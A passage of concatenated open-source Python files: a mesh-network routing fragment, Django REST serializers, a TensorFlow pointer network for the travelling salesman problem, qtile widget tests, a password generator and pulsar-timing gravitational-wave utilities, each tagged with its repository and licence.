self.routeLock.acquire()
if not self.routeBlock.isSet():
#self.printinfo("routeTimer Activate")
self.pendingRoute = 0
self.pendingRouteID = 0
self.routeBlock.set()
self.routeLock.release()
#self.printinfo("routeTimer exit")
def _popRoute(self, route):
firstStep = route & 0x7
newRoute = route >> 3
return (firstStep, newRoute)
def _pushRoute(self, route, nextStep):
newRoute = (route << 3) | (nextStep & 0x7)
return newRoute
def _enrollTimeout(self, nodeID, ACK):
for idx, pendingEnroll in enumerate(self.connCache):
if (nodeID, ACK) == pendingEnroll[0]:
self.connCache[idx] = (('',0),)
break
return
def _connTimeout(self, nodeIP, nodePort):
for idx, connAttempt in enumerate(self.connCache):
if (nodeIP, nodePort) == connAttempt[0]:
self.connCache[idx] = (('',0),)
break
return
def addConnection(self, DestNodeID):
addConnPkt = somnPkt.SomnPkt()
addConnPkt.InitEmpty(somnPkt.SomnPacketType.AddConnection)
addConnPkt.PacketFields['ReqNodeID'] = self.nodeID
addConnPkt.PacketFields['ReqNodeIP'] = self.nodeIP
addConnPkt.PacketFields['ReqNodePort'] = self.nodePort
addConnPkt.PacketFields['AckSeq'] = random.randbits(16)
route = self._getRoute(DestNodeID)
if route > 0:
addConnPkt.PacketFields['Route'] = route
else:
self.printinfo("AddConnection Failed to get route")
def CreateNode(printCallback = None):
mesh = somnMesh(queue.Queue(), queue.Queue(), printCallback)
return mesh
if __name__ == "__main__":
mesh = CreateNode()
mesh.start()
| squidpie/somn | src/somnMesh.py | Python | mit | 23,564 |
from rest_framework import serializers
from workers.models import (TaskConfig,
Task,
Job,
TaskProducer)
from grabbers.serializers import (MapperSerializer,
SequenceSerializer)
from grabbers.models import Sequence
from drivers.serializers import DriverSerializer
from drivers.models import Driver
from django.core.exceptions import ObjectDoesNotExist
# == helpers ==
from delphi.utils.lizers import _required_fields, _get_or_instance
class TaskConfigDetailSerializer(serializers.ModelSerializer):
'''
'''
driver=DriverSerializer()
sequence=SequenceSerializer()
class Meta:
model=TaskConfig
#no proxy by api yet - missing fields::proxy,network_cap
fields=('name','driver','sequence','mapper','round_limit')
def create(self, validated_data):
'''
'''
name=validated_data['name']
try:
task_config=TaskConfig.objects.get(name=name)
print("[-] We already this guy in db")
return task_config
except TaskConfig.DoesNotExist:
task_config=TaskConfig(name=name)
driver=_get_or_instance(Driver,'name',
validated_data['driver'],DriverSerializer)
sequence=_get_or_instance(Sequence,'name',
validated_data['sequence'],
SequenceSerializer)
task_config.driver=driver
task_config.sequence=sequence
return task_config
class TaskConfigListSerializer(serializers.HyperlinkedModelSerializer):
'''
'''
class Meta:
model=TaskConfig
fields=('url', 'name', 'sequence', 'driver', 'mapper','round_limit')
extra_kwargs = {
'url': {'view_name': 'api:task_config-detail', 'lookup_field':'name'},
'driver': {'view_name': 'api:driver-detail', 'lookup_field':'name'},
'sequence':{'view_name': 'api:sequence-detail', 'lookup_field':'name'},
'mapper':{'view_name':'api:mapper-detail', 'lookup_field':'name'},
}
class JobSerializer(serializers.ModelSerializer):
'''
'''
class Meta:
model=Job
fields=('status','name')
class TaskSerializer(serializers.ModelSerializer):
'''
'''
config=TaskConfigDetailSerializer()
job=JobSerializer()
class Meta:
model=Task
fields=('target_url', 'config', 'status', 'job')
| VulcanoAhab/delphi | workers/serializers.py | Python | mit | 2,526 |
import tensorflow as tf
from tensorflow.contrib.rnn import LSTMCell, GRUCell, MultiRNNCell, DropoutWrapper
from tqdm import tqdm
from decoder import pointer_decoder
import dataset
import matplotlib.pyplot as plt
# TODO
"""
Michel:
_____________________________________________________________________
- Plot tour with networkx
- Try Google's parameters
- Normalize input (scale distances) + reorder sequence
- Add bidirectional encoder, Dropout, Layers...
- Improve baseline estimate (CNN vs. FFN)
_____________________________________________________________________
- Variable seq length (padding) ****
- TSP with soft time windows (add exp loss) ***
(+ use Graph Theory : Coreness, Connectivity (or Katz_beta), Closeness, Betweeness, Cluster... & Topological descriptors - Reeb filtration ?)
_____________________________________________________________________
- Gumbel Softmax ?
- Monte Carlo Tree Search ?
_____________________________________________________________________
Pierre
- GAN (Discriminator CNN, Wasserstein...): pretrain ****
- Supervised setting: Cplex, Concorde... ***
- Back prop ***
_____________________________________________________________________
- Save & load model
- Use varscope, graph...
- import argparse (config)
- Summary writer (log)...
- Parallelize (GPU), C++...
- Nice plots, interface...
"""
class EncDecModel(object):
def __init__(self,args):
self.batch_size=args['batch_size'] # batch size
self.max_length = args['max_length'] # input sequence length (number of cities)
self.input_dimension = args['input_dimension'] # dimension of a city (coordinates)
self.K = self.input_dimension+1 # for KNN
self.input_new_dimension = self.input_dimension+2*self.K+1 # x,y + kNN index + kNN dist + indegree_ft (>0 for a hub)
self.input_embed=args['input_embed'] # dimension of embedding space (actor)
self.input_embed_c=args['input_embed'] # dimension of embedding space (critic)
self.num_neurons = args['num_neurons'] # dimension of hidden states (actor LSTM cell)
self.num_neurons_c = args['num_neurons'] # dimension of hidden states (critic LSTM cell)
self.hidden_dim= args['num_neurons'] # same thing...
self.initializer = tf.random_uniform_initializer(-args['init_range'], args['init_range']) # variables initializer
self.step=0 # int to reuse_variable in scope
self.init_bias_c = args['init_bias_c'] # initial bias for critic
self.temperature_decay = args['temperature_decay'] # temperature decay rate
self.build_actor()
self.build_critic()
self.build_reward()
self.build_optim()
def build_actor(self):
# Tensor blocks holding the input sequences [Batch Size, Sequence Length, Features]
self.input_coordinates = tf.placeholder(tf.float32, [self.batch_size, self.max_length, self.input_dimension], name="Input")
self.input_description = tf.placeholder(tf.float32, [self.batch_size, self.max_length, self.input_new_dimension], name="Input")
# Embed input sequence
W_embed = tf.Variable(tf.truncated_normal([1,self.input_new_dimension,self.input_embed]), name="W_embed")
with tf.variable_scope("Embed"):
if self.step>0:
tf.get_variable_scope().reuse_variables()
embeded_input = tf.nn.conv1d(self.input_description, W_embed, 1, "VALID", name="EncoderInput")
# ENCODER LSTM cell
cell1 = LSTMCell(self.num_neurons,initializer=self.initializer) # cell = DropoutWrapper(cell, output_keep_prob=dropout) or MultiRNNCell([cell] * num_layers)
# RNN-ENCODER returns the output activations [Batch size, Sequence Length, Num_neurons] and last hidden state as tensors.
encoder_output, encoder_state = tf.nn.dynamic_rnn(cell1, embeded_input, dtype=tf.float32) ### NOTE: encoder_output is the ref for attention ###
# DECODER initial state is the last relevant state from encoder
decoder_initial_state = encoder_state ### NOTE: if state_tuple=True, self.decoder_initial_state = (c,h) ###
# DECODER initial input is 'GO', a variable tensor
decoder_first_input = tf.Variable(tf.truncated_normal([self.batch_size,self.hidden_dim]), name="GO")
# DECODER LSTM cell
cell2 = LSTMCell(self.num_neurons,initializer=self.initializer)
# POINTER-DECODER returns the output activations, hidden states, hard attention and decoder inputs as tensors.
self.ptr = pointer_decoder(encoder_output, cell2)
self.positions, self.proba, self.log_softmax = self.ptr.loop_decode(decoder_initial_state, decoder_first_input)
def build_critic(self):
# Embed input sequence (for critic)
W_embed_c = tf.Variable(tf.truncated_normal([1,self.input_new_dimension,self.input_embed_c]), name="critic_W_embed")
with tf.variable_scope("Critic"):
if self.step>0:
tf.get_variable_scope().reuse_variables()
embeded_input_c = tf.nn.conv1d(self.input_description, W_embed_c, 1, "VALID", name="Critic_EncoderInput")
# ENCODER LSTM cell
cell_c = LSTMCell(self.num_neurons_c,initializer=self.initializer) # cell = DropoutWrapper(cell, output_keep_prob=dropout) or MultiRNNCell([cell] * num_layers)
# RNN-ENCODER returns the output activations [Batch size, Sequence Length, Num_neurons] and last hidden state as tensors.
encoder_output_c, encoder_state_c = tf.nn.dynamic_rnn(cell_c, embeded_input_c, dtype=tf.float32)
encoder_output_c = tf.transpose(encoder_output_c, [1, 0, 2]) # transpose time axis first [time steps x Batch size x num_neurons]
last_c = tf.gather(encoder_output_c, int(encoder_output_c.get_shape()[0]) - 1) # select last frame [Batch size x num_neurons]
### DO A CONVOLUTION HERE INSTEAD OF A FFN !!! ###
weight_c = tf.Variable(tf.truncated_normal([self.num_neurons_c, 1], stddev=0.1))
bias_c = tf.Variable(tf.constant(self.init_bias_c, shape=[1]))
self.prediction_c = tf.matmul(last_c, weight_c) + bias_c
def build_reward(self):
# From input sequence and hard attention, get coordinates of the agent's trip
tours=[]
shifted_tours=[]
for k in range(self.batch_size):
strip=tf.gather_nd(self.input_coordinates,[k])
tour=tf.gather_nd(strip,tf.expand_dims(self.positions[k],1))
tours.append(tour)
# Shift tour to calculate tour length
shifted_tour=[tour[k] for k in range(1,self.max_length)]
shifted_tour.append(tour[0])
shifted_tours.append(tf.stack(shifted_tour,0))
self.trip=tf.stack(tours,0)
self.shifted_trip=tf.stack(shifted_tours,0)
# Get delta_x**2 and delta_y**2 for shifting from a city to another
sqdeltax=tf.transpose(tf.square(tf.transpose((self.shifted_trip-self.trip),[2,1,0]))[0],[1,0]) # [batch,length,(x,y)] to (x)[length,batch] back to [batch,length]
sqdeltay=tf.transpose(tf.square(tf.transpose((self.shifted_trip-self.trip),[2,1,0]))[1],[1,0])
# Get distances separating cities at each step
euclidean_distances=tf.sqrt(sqdeltax+sqdeltay)
# Reduce to obtain tour length
self.distances=tf.expand_dims(tf.reduce_sum(euclidean_distances,axis=1),1)
# Define reward from objective and penalty
self.reward = -tf.cast(self.distances,tf.float32)
def build_optim(self):
# ACTOR Optimizer
self.opt1 = tf.train.AdamOptimizer(learning_rate=0.01,beta1=0.9,beta2=0.9,epsilon=0.1)
# Discounted reward
self.reward_baseline=tf.stop_gradient(self.reward-self.prediction_c) # [Batch size, 1]
# Loss
self.loss1=tf.reduce_sum(tf.multiply(self.log_softmax,self.reward_baseline),0)/self.batch_size
# Minimize step
self.train_step1 = self.opt1.minimize(self.loss1)
# Critic Optimizer
self.opt2 = tf.train.AdamOptimizer(learning_rate=0.01,beta1=0.9,beta2=0.9,epsilon=0.1)
# Loss
self.loss2=tf.losses.mean_squared_error(self.reward,self.prediction_c)
# Minimize step
self.train_step2 = self.opt2.minimize(self.loss2)
def run_episode(self,sess):
# Get feed_dict
training_set = dataset.DataGenerator()
coord_batch, dist_batch, input_batch = training_set.next_batch(self.batch_size, self.max_length, self.input_dimension)
feed = {self.input_coordinates: coord_batch, self.input_description: input_batch}
# Actor Forward pass
seq_input, permutation, seq_proba = sess.run([self.input_coordinates,self.positions,self.proba],feed_dict=feed)
# Critic Forward pass
b_s = sess.run(self.prediction_c,feed_dict=feed)
# Environment response
trip, circuit_length, reward = sess.run([self.trip,self.distances,self.reward], feed_dict=feed)
# Train step
if self.step==0:
loss1, train_step1 = sess.run([self.loss1,self.train_step1],feed_dict=feed)
else:
loss1, train_step1, loss2, train_step2= sess.run([self.loss1,self.train_step1,self.loss2,self.train_step2],feed_dict=feed)
self.step+=1
if self.step%100==0:
self.ptr.temperature*=self.temperature_decay
return seq_input, permutation, seq_proba, b_s, trip, circuit_length, reward
def train():
# Config
args={}
args['batch_size']=32
args['max_length']=5
args['input_dimension']=2
args['input_embed']=16
args['init_bias_c']=-args['max_length']/2
args['num_neurons']=256
args['init_range']=1
args['temperature_decay']=1
# Build Model and Reward
print("Initializing the Model...")
model = EncDecModel(args)
print("Starting training...")
with tf.Session() as sess:
tf.global_variables_initializer().run() #tf.initialize_all_variables().run()
saver = tf.train.Saver(tf.all_variables())
print('\n')
print('Config:')
print('* Batch size:',model.batch_size)
print('* Sequence length:',model.max_length)
print('* City coordinates:',model.input_dimension)
print('* City dimension:',model.input_new_dimension)
print('* Input embedding:',model.input_embed)
print('* Num neurons (Actor & critic):',model.num_neurons)
print('\n')
avg_ac_deviation = []
avg_seq_proba = []
for i in tqdm(range(100)): # epoch i
seq_input, permutation, seq_proba, b_s, trip, circuit_length, reward = model.run_episode(sess)
# Store Actor-Critic deviation & seq proba
avg_ac_deviation.append(sess.run(tf.reduce_mean(100*(reward-b_s)/circuit_length)))
avg_seq_proba.append(sess.run(tf.reduce_mean(seq_proba)))
if i % 10 == 0:
#print('\n Input: \n', seq_input)
#print('\n Permutation: \n', permutation)
#print('\n Seq proba: \n', seq_proba)
#print('\n Critic baseline: \n', b_s)
#print('\n Trip : \n', trip)
#print('\n Circuit length: \n',circuit_length)
#print('\n Reward : \n', reward)
#print(' Average seq proba :',sess.run(tf.reduce_mean(seq_proba,0)))
print(' Average seq proba :',sess.run(tf.reduce_mean(seq_proba)))
print(' Average circuit length :',sess.run(tf.reduce_mean(circuit_length)))
print(' Average baseline :', sess.run(-tf.reduce_mean(b_s)))
print(' Average deviation:', sess.run(tf.reduce_mean(100*(reward-b_s)/circuit_length)))
print('\n')
if i % 1000 == 0 and not(i == 0):
saver.save(sess,"save/" +str(i) +".ckpt")
plt.figure(1)
plt.subplot(211)
plt.plot(avg_ac_deviation)
plt.ylabel('Critic average deviation (%)')
plt.xlabel('Epoch')
plt.subplot(212)
plt.plot(avg_seq_proba)
plt.ylabel('Actor average seq proba')
plt.xlabel('Epoch')
plt.show()
print('\n Trainable variables')
for v in tf.trainable_variables():
print(v.name)
print("Training is COMPLETE!")
saver.save(sess,"save/model.ckpt")
if __name__ == "__main__":
train() | pcournut/deep-learning-for-combinatorial-optimization | MD/nnet.py | Python | mit | 12,765 |
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Widget specific tests
import subprocess
from typing import List
import pytest
from libqtile.widget import caps_num_lock_indicator
from test.widgets.conftest import FakeBar
class MockCapsNumLockIndicator:
CalledProcessError = None
info: List[List[str]] = []
is_error = False
index = 0
@classmethod
def reset(cls):
cls.info = [
[
"Keyboard Control:",
" auto repeat: on key click percent: 0 LED mask: 00000002",
" XKB indicators:",
" 00: Caps Lock: off 01: Num Lock: on 02: Scroll Lock: off",
" 03: Compose: off 04: Kana: off 05: Sleep: off",
],
[
"Keyboard Control:",
" auto repeat: on key click percent: 0 LED mask: 00000002",
" XKB indicators:",
" 00: Caps Lock: on 01: Num Lock: on 02: Scroll Lock: off",
" 03: Compose: off 04: Kana: off 05: Sleep: off",
],
]
cls.index = 0
cls.is_error = False
@classmethod
def call_process(cls, cmd):
if cls.is_error:
raise subprocess.CalledProcessError(-1, cmd=cmd, output="Couldn't call xset.")
if cmd[1:] == ["q"]:
track = cls.info[cls.index]
output = "\n".join(track)
return output
def no_op(*args, **kwargs):
pass
@pytest.fixture
def patched_cnli(monkeypatch):
MockCapsNumLockIndicator.reset()
monkeypatch.setattr(
"libqtile.widget.caps_num_lock_indicator.subprocess", MockCapsNumLockIndicator
)
monkeypatch.setattr(
"libqtile.widget.caps_num_lock_indicator.subprocess.CalledProcessError",
subprocess.CalledProcessError,
)
monkeypatch.setattr(
"libqtile.widget.caps_num_lock_indicator.base.ThreadPoolText.call_process",
MockCapsNumLockIndicator.call_process,
)
return caps_num_lock_indicator
def test_cnli(fake_qtile, patched_cnli, fake_window):
widget = patched_cnli.CapsNumLockIndicator()
fakebar = FakeBar([widget], window=fake_window)
widget._configure(fake_qtile, fakebar)
text = widget.poll()
assert text == "Caps off Num on"
def test_cnli_caps_on(fake_qtile, patched_cnli, fake_window):
widget = patched_cnli.CapsNumLockIndicator()
# Simulate Caps on
MockCapsNumLockIndicator.index = 1
fakebar = FakeBar([widget], window=fake_window)
widget._configure(fake_qtile, fakebar)
text = widget.poll()
assert text == "Caps on Num on"
def test_cnli_error_handling(fake_qtile, patched_cnli, fake_window):
widget = patched_cnli.CapsNumLockIndicator()
# Simulate a CalledProcessError exception
MockCapsNumLockIndicator.is_error = True
fakebar = FakeBar([widget], window=fake_window)
widget._configure(fake_qtile, fakebar)
text = widget.poll()
# Widget does nothing with error message so text is blank
assert text == ""
| qtile/qtile | test/widgets/test_caps_num_lock_indicator.py | Python | mit | 4,137 |
import random
from string import digits, ascii_letters, punctuation
def password_generator(length):
while True:
values = list(digits + ascii_letters + punctuation)
yield ''.join([random.choice(values) for i in range(length)])
| id2669099/turbo-waffle | task_07_02.py | Python | mit | 249 |
# utils.py
"""
Utilities module containing various useful
functions for use in other modules.
"""
import logging
import numpy as np
import scipy.linalg as sl
import scipy.sparse as sps
import scipy.special as ss
from pkg_resources import Requirement, resource_filename
from scipy.integrate import odeint
from scipy.interpolate import interp1d
from sksparse.cholmod import cholesky
import enterprise
from enterprise import constants as const
from enterprise import signals as sigs # noqa: F401
from enterprise.signals.gp_bases import ( # noqa: F401
createfourierdesignmatrix_dm,
createfourierdesignmatrix_env,
createfourierdesignmatrix_eph,
createfourierdesignmatrix_ephem,
createfourierdesignmatrix_red,
)
from enterprise.signals.gp_priors import powerlaw, turnover # noqa: F401
from enterprise.signals.parameter import function
logger = logging.getLogger(__name__)
def get_coefficients(pta, params, n=1, phiinv_method="cliques", common_sparse=False):
ret = []
TNrs = pta.get_TNr(params)
TNTs = pta.get_TNT(params)
phiinvs = pta.get_phiinv(params, logdet=False, method=phiinv_method)
# ...repeated code in the two if branches... refactor at will!
if pta._commonsignals:
if common_sparse:
Sigma = sps.block_diag(TNTs, "csc") + sps.csc_matrix(phiinvs)
TNr = np.concatenate(TNrs)
ch = cholesky(Sigma)
mn = ch(TNr)
Li = sps.linalg.inv(ch.L()).toarray()
else:
Sigma = sl.block_diag(*TNTs) + phiinvs
TNr = np.concatenate(TNrs)
u, s, _ = sl.svd(Sigma)
mn = np.dot(u, np.dot(u.T, TNr) / s)
Li = u * np.sqrt(1 / s)
for j in range(n):
b = mn + np.dot(Li, np.random.randn(Li.shape[0]))
pardict, ntot = {}, 0
for i, model in enumerate(pta.pulsarmodels):
for sig in model._signals:
if sig.signal_type in ["basis", "common basis"]:
nb = sig.get_basis(params=params).shape[1]
if nb + ntot > len(b):
raise IndexError(
"Missing some parameters! " "You need to disable GP " "basis column reuse."
)
pardict[sig.name + "_coefficients"] = b[ntot : nb + ntot]
ntot += nb
if len(ret) <= j:
ret.append(params.copy())
ret[j].update(pardict)
return ret[0] if n == 1 else ret
else:
for i, model in enumerate(pta.pulsarmodels):
phiinv, d, TNT = phiinvs[i], TNrs[i], TNTs[i]
Sigma = TNT + (np.diag(phiinv) if phiinv.ndim == 1 else phiinv)
try:
u, s, _ = sl.svd(Sigma)
mn = np.dot(u, np.dot(u.T, d) / s)
Li = u * np.sqrt(1 / s)
except np.linalg.LinAlgError:
Q, R = sl.qr(Sigma)
Sigi = sl.solve(R, Q.T)
mn = np.dot(Sigi, d)
u, s, _ = sl.svd(Sigi)
Li = u * np.sqrt(1 / s)
for j in range(n):
b = mn + np.dot(Li, np.random.randn(Li.shape[0]))
pardict, ntot = {}, 0
for sig in model._signals:
if sig.signal_type == "basis":
nb = sig.get_basis(params=params).shape[1]
if nb + ntot > len(b):
raise IndexError(
"Missing some parameters! " "You need to disable GP " "basis column reuse."
)
pardict[sig.name + "_coefficients"] = b[ntot : nb + ntot]
ntot += nb
if len(ret) <= j:
ret.append(params.copy())
ret[j].update(pardict)
return ret[0] if n == 1 else ret
class KernelMatrix(np.ndarray):
def __new__(cls, init):
if isinstance(init, int):
ret = np.zeros(init, "d").view(cls)
else:
ret = init.view(cls)
if ret.ndim == 2:
ret._cliques = -1 * np.ones(ret.shape[0])
ret._clcount = 0
return ret
# see PTA._setcliques
def _setcliques(self, idxs):
allidx = set(self._cliques[idxs])
maxidx = max(allidx)
if maxidx == -1:
self._cliques[idxs] = self._clcount
self._clcount = self._clcount + 1
else:
self._cliques[idxs] = maxidx
if len(allidx) > 1:
self._cliques[np.in1d(self._cliques, allidx)] = maxidx
def add(self, other, idx):
if other.ndim == 2 and self.ndim == 1:
self = KernelMatrix(np.diag(self))
if self.ndim == 1:
self[idx] += other
else:
if other.ndim == 1:
self[idx, idx] += other
else:
self._setcliques(idx)
idx = (idx, idx) if isinstance(idx, slice) else (idx[:, None], idx)
self[idx] += other
return self
def set(self, other, idx):
if other.ndim == 2 and self.ndim == 1:
self = KernelMatrix(np.diag(self))
if self.ndim == 1:
self[idx] = other
else:
if other.ndim == 1:
self[idx, idx] = other
else:
self._setcliques(idx)
idx = (idx, idx) if isinstance(idx, slice) else (idx[:, None], idx)
self[idx] = other
return self
def inv(self, logdet=False):
if self.ndim == 1:
inv = 1.0 / self
if logdet:
return inv, np.sum(np.log(self))
else:
return inv
else:
try:
cf = sl.cho_factor(self)
inv = sl.cho_solve(cf, np.identity(cf[0].shape[0]))
if logdet:
ld = 2.0 * np.sum(np.log(np.diag(cf[0])))
except np.linalg.LinAlgError:
u, s, v = np.linalg.svd(self)
inv = np.dot(u / s, u.T)
if logdet:
ld = np.sum(np.log(s))
if logdet:
return inv, ld
else:
return inv
def create_stabletimingdesignmatrix(designmat, fastDesign=True):
"""
Stabilize the timing-model design matrix.
:param designmat: Pulsar timing model design matrix
:param fastDesign: Stabilize the design matrix the fast way [True]
:return: Mm: Stabilized timing model design matrix
"""
Mm = designmat.copy()
if fastDesign:
norm = np.sqrt(np.sum(Mm ** 2, axis=0))
Mm /= norm
else:
u, s, v = np.linalg.svd(Mm)
Mm = u[:, : len(s)]
return Mm
###################################
# Deterministic GW signal functions
###################################
def make_ecc_interpolant():
"""
Make interpolation function from eccentricity file to
determine number of harmonics to use for a given
eccentricity.
:returns: interpolant
"""
pth = resource_filename(Requirement.parse("libstempo"), "libstempo/ecc_vs_nharm.txt")
fil = np.loadtxt(pth)
return interp1d(fil[:, 0], fil[:, 1])
def get_edot(F, mc, e):
"""
Compute eccentricity derivative from Taylor et al. (2016)
:param F: Orbital frequency [Hz]
:param mc: Chirp mass of binary [Solar Mass]
:param e: Eccentricity of binary
:returns: de/dt
"""
# chirp mass
mc *= const.Tsun
dedt = -304 / (15 * mc) * (2 * np.pi * mc * F) ** (8 / 3) * e * (1 + 121 / 304 * e ** 2) / ((1 - e ** 2) ** (5 / 2))
return dedt
def get_Fdot(F, mc, e):
"""
Compute frequency derivative from Taylor et al. (2016)
:param F: Orbital frequency [Hz]
:param mc: Chirp mass of binary [Solar Mass]
:param e: Eccentricity of binary
:returns: dF/dt
"""
# chirp mass
mc *= const.Tsun
dFdt = (
48
/ (5 * np.pi * mc ** 2)
* (2 * np.pi * mc * F) ** (11 / 3)
* (1 + 73 / 24 * e ** 2 + 37 / 96 * e ** 4)
/ ((1 - e ** 2) ** (7 / 2))
)
return dFdt
def get_gammadot(F, mc, q, e):
"""
Compute gamma dot from Barack and Cutler (2004)
:param F: Orbital frequency [Hz]
:param mc: Chirp mass of binary [Solar Mass]
:param q: Mass ratio of binary
:param e: Eccentricity of binary
:returns: dgamma/dt
"""
# chirp mass
mc *= const.Tsun
# total mass
m = (((1 + q) ** 2) / q) ** (3 / 5) * mc
dgdt = (
6
* np.pi
* F
* (2 * np.pi * F * m) ** (2 / 3)
/ (1 - e ** 2)
* (1 + 0.25 * (2 * np.pi * F * m) ** (2 / 3) / (1 - e ** 2) * (26 - 15 * e ** 2))
)
return dgdt
def get_coupled_constecc_eqns(y, t, mc, e0):
"""
Computes the coupled system of differential
equations from Peters (1964) and Barack &
Cutler (2004). This is a system of three variables:
F: Orbital frequency [Hz]
phase0: Orbital phase [rad]
:param y: Vector of input parameters [F, e, gamma]
:param t: Time [s]
:param mc: Chirp mass of binary [Solar Mass]
:returns: array of derivatives [dF/dt, dphase/dt]
"""
F = y[0]
dFdt = get_Fdot(F, mc, e0)
dphasedt = 2 * np.pi * F
return np.array([dFdt, dphasedt])
def get_coupled_ecc_eqns(y, t, mc, q):
"""
Computes the coupled system of differential
equations from Peters (1964) and Barack &
Cutler (2004). This is a system of three variables:
F: Orbital frequency [Hz]
e: Orbital eccentricity
gamma: Angle of precession of periastron [rad]
phase0: Orbital phase [rad]
:param y: Vector of input parameters [F, e, gamma]
:param t: Time [s]
:param mc: Chirp mass of binary [Solar Mass]
:param q: Mass ratio of binary
:returns: array of derivatives [dF/dt, de/dt, dgamma/dt, dphase/dt]
"""
F = y[0]
e = y[1]
dFdt = get_Fdot(F, mc, e)
dedt = get_edot(F, mc, e)
dgdt = get_gammadot(F, mc, q, e)
dphasedt = 2 * np.pi * F
return np.array([dFdt, dedt, dgdt, dphasedt])
def solve_coupled_constecc_solution(F0, e0, phase0, mc, t):
"""
Compute the solution to the coupled system of equations
from from Peters (1964) and Barack & Cutler (2004) at
a given time.
:param F0: Initial orbital frequency [Hz]
:param mc: Chirp mass of binary [Solar Mass]
:param t: Time at which to evaluate solution [s]
:returns: (F(t), phase(t))
"""
y0 = np.array([F0, phase0])
y, infodict = odeint(get_coupled_constecc_eqns, y0, t, args=(mc, e0), full_output=True)
if infodict["message"] == "Integration successful.":
ret = y
else:
ret = 0
return ret
def solve_coupled_ecc_solution(F0, e0, gamma0, phase0, mc, q, t):
"""
Compute the solution to the coupled system of equations
from from Peters (1964) and Barack & Cutler (2004) at
a given time.
:param F0: Initial orbital frequency [Hz]
:param e0: Initial orbital eccentricity
:param gamma0: Initial angle of precession of periastron [rad]
:param mc: Chirp mass of binary [Solar Mass]
:param q: Mass ratio of binary
:param t: Time at which to evaluate solution [s]
:returns: (F(t), e(t), gamma(t), phase(t))
"""
y0 = np.array([F0, e0, gamma0, phase0])
y, infodict = odeint(get_coupled_ecc_eqns, y0, t, args=(mc, q), full_output=True)
if infodict["message"] == "Integration successful.":
ret = y
else:
ret = 0
return ret
def get_an(n, mc, dl, h0, F, e):
"""
Compute a_n from Eq. 22 of Taylor et al. (2016).
:param n: Harmonic number
:param mc: Chirp mass of binary [Solar Mass]
:param dl: Luminosity distance [Mpc]
:param F: Orbital frequency of binary [Hz]
:param e: Orbital Eccentricity
:returns: a_n
"""
# convert to seconds
mc *= const.Tsun
dl *= const.Mpc / const.c
omega = 2 * np.pi * F
if h0 is None:
amp = n * mc ** (5 / 3) * omega ** (2 / 3) / dl
elif h0 is not None:
amp = n * h0 / 2.0
ret = -amp * (
ss.jn(n - 2, n * e)
- 2 * e * ss.jn(n - 1, n * e)
+ (2 / n) * ss.jn(n, n * e)
+ 2 * e * ss.jn(n + 1, n * e)
- ss.jn(n + 2, n * e)
)
return ret
def get_bn(n, mc, dl, h0, F, e):
"""
Compute b_n from Eq. 22 of Taylor et al. (2015).
:param n: Harmonic number
:param mc: Chirp mass of binary [Solar Mass]
:param dl: Luminosity distance [Mpc]
:param F: Orbital frequency of binary [Hz]
:param e: Orbital Eccentricity
:returns: b_n
"""
# convert to seconds
mc *= const.Tsun
dl *= const.Mpc / const.c
omega = 2 * np.pi * F
if h0 is None:
amp = n * mc ** (5 / 3) * omega ** (2 / 3) / dl
elif h0 is not None:
amp = n * h0 / 2.0
ret = -amp * np.sqrt(1 - e ** 2) * (ss.jn(n - 2, n * e) - 2 * ss.jn(n, n * e) + ss.jn(n + 2, n * e))
return ret
def get_cn(n, mc, dl, h0, F, e):
"""
Compute c_n from Eq. 22 of Taylor et al. (2016).
:param n: Harmonic number
:param mc: Chirp mass of binary [Solar Mass]
:param dl: Luminosity distance [Mpc]
:param F: Orbital frequency of binary [Hz]
:param e: Orbital Eccentricity
:returns: c_n
"""
# convert to seconds
mc *= const.Tsun
dl *= const.Mpc / const.c
omega = 2 * np.pi * F
if h0 is None:
amp = 2 * mc ** (5 / 3) * omega ** (2 / 3) / dl
elif h0 is not None:
amp = h0
ret = amp * ss.jn(n, n * e) / (n * omega)
return ret
def calculate_splus_scross(nmax, mc, dl, h0, F, e, t, l0, gamma, gammadot, inc):
"""
Calculate splus and scross for a CGW summed over all harmonics.
This waveform differs slightly from that in Taylor et al (2016)
in that it includes the time dependence of the advance of periastron.
:param nmax: Total number of harmonics to use
:param mc: Chirp mass of binary [Solar Mass]
:param dl: Luminosity distance [Mpc]
:param F: Orbital frequency of binary [Hz]
:param e: Orbital Eccentricity
:param t: TOAs [s]
:param l0: Initial eccentric anomoly [rad]
:param gamma: Angle of periastron advance [rad]
:param gammadot: Time derivative of angle of periastron advance [rad/s]
:param inc: Inclination angle [rad]
:return splus, scross: plus and cross time-domain waveforms for a CGW
"""
n = np.arange(1, nmax)
# time dependent amplitudes
an = get_an(n, mc, dl, h0, F, e)
bn = get_bn(n, mc, dl, h0, F, e)
cn = get_cn(n, mc, dl, h0, F, e)
# time dependent terms
omega = 2 * np.pi * F
gt = gamma + gammadot * t
lt = l0 + omega * t
# tiled phase
phase1 = n * np.tile(lt, (nmax - 1, 1)).T
phase2 = np.tile(gt, (nmax - 1, 1)).T
sinp1 = np.sin(phase1)
cosp1 = np.cos(phase1)
sinp2 = np.sin(2 * phase2)
cosp2 = np.cos(2 * phase2)
sinpp = sinp1 * cosp2 + cosp1 * sinp2
cospp = cosp1 * cosp2 - sinp1 * sinp2
sinpm = sinp1 * cosp2 - cosp1 * sinp2
cospm = cosp1 * cosp2 + sinp1 * sinp2
# intermediate terms
sp = sinpm / (n * omega - 2 * gammadot) + sinpp / (n * omega + 2 * gammadot)
sm = sinpm / (n * omega - 2 * gammadot) - sinpp / (n * omega + 2 * gammadot)
cp = cospm / (n * omega - 2 * gammadot) + cospp / (n * omega + 2 * gammadot)
